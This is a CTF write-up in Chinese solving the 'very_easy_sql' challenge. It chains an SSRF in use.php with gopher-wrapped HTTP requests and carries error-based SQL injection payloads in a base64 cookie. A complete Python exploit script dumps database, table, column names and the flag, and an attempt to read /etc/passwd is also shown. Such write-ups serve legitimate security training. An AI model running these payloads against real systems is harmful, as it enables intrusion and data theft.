[CTF]攻防世界:very_easy_sql(gopher)

pandarking2025-12-06 7:08

题目:攻防世界:very_easy_sql

提示:gopher extractvalue

步骤

  1. 尝试登录框输入万能密码和sql注入,发现都没有反应。(admin' or '1'='1 ...),查看源码
  1. 发现use.php

    猜测ssrf,可以访问到我们本不能访问的界面,比如:服务器本地的127.0.0.1:3306。先尝试127.0.0.1

    发现成功包含了index.php页面,此页面端口号为80端口,而我们要用到的就是这个端口,还记得一开始的页面:
  1. 应该是借助这里的SSRF,才有正常的身份验证权,现在就是想如何借助SSRF向服务器构造请求,让服务器正常执行我们的身份验证权。

尝试:file:///etc/passwd -> nonono 猜测有协议过滤

最终发现gopher不会出现nono用no,这也是我们可以利用的一个协议

gopher协议:可直接封装TCP数据流,模拟基于TCP的应用层协议,只要按目标服务的协议格式构造数据,就能通过gopher协议发送请求。借用该协议SSRF可借助服务器权限攻击内网中原本无法直接访问的服务,实现命令执行,文件写入等高危操作。

  1. 参考了其他师傅的文章,写的脚本
c 复制代码 
import base64
import urllib.parse
import re
import requests

def getcookie():
    host = "127.0.0.1:80"
    postdata = "uname=admin&passwd=admin"
    postsize = len(postdata)

    postPayload = \
"""POST /index.php HTTP/1.1
Host: {}
User-Agent: curl/7.43.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: {}

{}
""".format(host, postsize, postdata)

    urlencode = urllib.parse.quote(postPayload,safe='')
    new = urlencode.replace("%0A", "%0D%0A")
    result = urllib.parse.quote(new)

    return("gopher://" + host + "/_" + result)

def payload(sql):
    sql1=base64.b64encode(sql.encode('utf-8')).decode('utf-8')
    cookie=f"this_is_your_cookie={sql1}"

    data = \
f'''POST /index.php HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Cookie: {cookie}
'''
    # 注意这里的data不能缩进

    data_url1 = urllib.parse.quote(data)
    data_url1 = data_url1.replace("%0A","%0D%0A")
    gopher='gopher://127.0.0.1:80/_'+data_url1
    return gopher


testurl ="http://61.147.171.35:64144/use.php"

# 获取cookie
# cookie_pay = getcookie()
# print("getcookie:",cookie_pay)

# 测试

# sql="admin') and  extractvalue(1,concat(0x7e,database()))#" # 获取数据库名
#sql="admin') and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'))) #"  # 获取表名
#sql = "admin') and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='flag'))) #"  # 获取列名
sql = "admin') and extractvalue(1,concat(0x7e,(select flag from flag))) #"  # 获取flag
#cyberpeace{cc9bc826df9db6a3e85c4ff009a46b05}

pay=payload(sql)
# print(urllib.parse.quote(pay))
params={'url':f'{pay}'}
res=requests.get(testurl,params=params)
response = res.text

pattern = re.compile(r'Issue with your mysql:(.*)')

if response.find("Issue") > 0:
    a = pattern.findall(response)
    print(a[0])
相关推荐
techdashen9 分钟前
dial9:给 Tokio 装上“飞行记录仪“
java·数据库·redis
2501_9010064710 分钟前
Golang怎么用gRPC Gateway_Golang gRPC Gateway教程【经典】
jvm·数据库·python
2501_9012005311 分钟前
golang如何实现错误预算Error Budget计算_golang错误预算Error Budget计算实现实战
jvm·数据库·python
2401_8676239822 分钟前
如何解决OUI图形界面无法调用_xhost与DISPLAY变量设置
jvm·数据库·python
czlczl2002092527 分钟前
Mysql读写分离的过期读问题
数据库·mysql
2401_8246976639 分钟前
CSS如何实现元素反转特效_使用transform-scaleX(-1)操作
jvm·数据库·python
皮皮学姐分享-ppx1 小时前
上市公司数字技术风险暴露数据(2010-2024)|《经济研究》同款大模型测算
大数据·网络·数据库·人工智能·chatgpt·制造
CLX05051 小时前
如何在 WordPress AMP 网站中为特定模板禁用 AMP 渲染
jvm·数据库·python
号码认证服务1 小时前
如何让经销商接电话时看到“XX集团”?申请号码认证统一上线
服务器·经验分享·sql·华为·智能手机·华为云·云计算
神明9311 小时前
如何实现SQL动态字段选择查询_利用反射或动态拼接字符串
jvm·数据库·python
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03CC-Switch & Claude 基于 Linux 服务器安装使用指南04【AI】2026 年具身智能模型和世界模型总结05零基础教你claude code 接入 deepseek V406Cursor 接入 DeepSeek‑V4‑Pro 完整指南(2026 实测)07codex app每次打开重连5次Reconnecting问题解决08裂开!ChatGPT 居然开始要手机号验证,附详细解决方法09Windows端Codex接入第三方模型(DeekSeek,BaiLian)10AI科技热点日报 | 2026年5月11日